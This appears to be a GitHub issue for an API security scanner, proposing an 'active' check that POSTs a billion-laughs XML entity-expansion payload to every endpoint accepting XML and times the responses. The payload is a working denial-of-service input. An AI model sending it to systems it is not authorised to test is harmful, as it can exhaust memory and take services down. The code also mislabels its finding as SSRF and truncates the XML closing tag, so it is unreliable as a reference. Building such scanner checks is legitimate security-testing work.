XML bomb active check
RazMag opened this issue · comments
This is a check suggested by @DeliciousBounty
Currently not implemented until testing levels are implemented since it could be destructive
pub async fn check_xml_bomb(&self, auth: &Authorization) -> (CheckRetVal, Vec<Duration>) {
let body = format!(
r#"
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz
"#
);
let mut ret_val = CheckRetVal::default();
let mut vec_time = vec![];
// if let Some(content) = &op.request_body{
for oas_map in self.payloads.iter() {
for (json_path, schema) in &oas_map.payload.map {
// .filter_map(|x| x){
for (m, _operation) in oas_map
.path
.path_item
.get_ops()
.iter()
.filter(|(m, _)| m == &Method::POST)
.filter(|(_method, operation)| {
operation
.request_body
.clone()
.unwrap_or_default()
.inner(&self.oas_value)
.content
.into_keys()
.collect::<Vec<String>>()
.contains(&"application/xml".to_string())
// if let Some(value) = &operation.request_body{
// for ( string_item, Mediatype_item) in &value.inner(&self.oas_value).content {
// println!("{:?}", string_item);
// if string_item == "application/xml"{
// println!("THere is one least");
// }
// ;
// }
})
.next()
// .filter(|(operation)| operation.1.request_body.unwrap().clone().inner(&self.oas_value).content.keys())
{
// println!("{:?}", operation);
println!("ENCONDING {:?}", &oas_map.path.path);
let h = MHeader {
name: "Content-type".to_string(),
value: "application/xml".to_string(),
};
let base_url = self.oas.servers().unwrap().iter().next().unwrap().clone();
let req = AttackRequest::builder()
.uri(&base_url.url, &oas_map.path.path)
.method(*m)
.headers(vec![h])
.payload(&body)
.parameters(vec![])
.auth(auth.clone())
.build();
print!("XML BOMB : ");
/* let start = Instant::now();
expensive_function();
let duration = start.elapsed(); */
let start = Instant::now();
if let Ok(res) = req.send_request(true).await {
//logging request/response/description
ret_val.1.push(&req, &res, "Test for XML BOMB".to_string());
ret_val.0.push((
ResponseData {
location: oas_map.path.path.clone(),
alert_text: format!(
"This parameter on the endpoint seems to be vulerable to ssrf.", // json_path[json_path.len() - 1]
),
},
res.clone(),
));
println!(
"{}:{}",
"Status".green().bold(),
res.status.to_string().magenta()
);
} else {
println!("REQUEST FAILED");
}
vec_time.push(start.elapsed());
}
}
}
(ret_val, vec_time)
}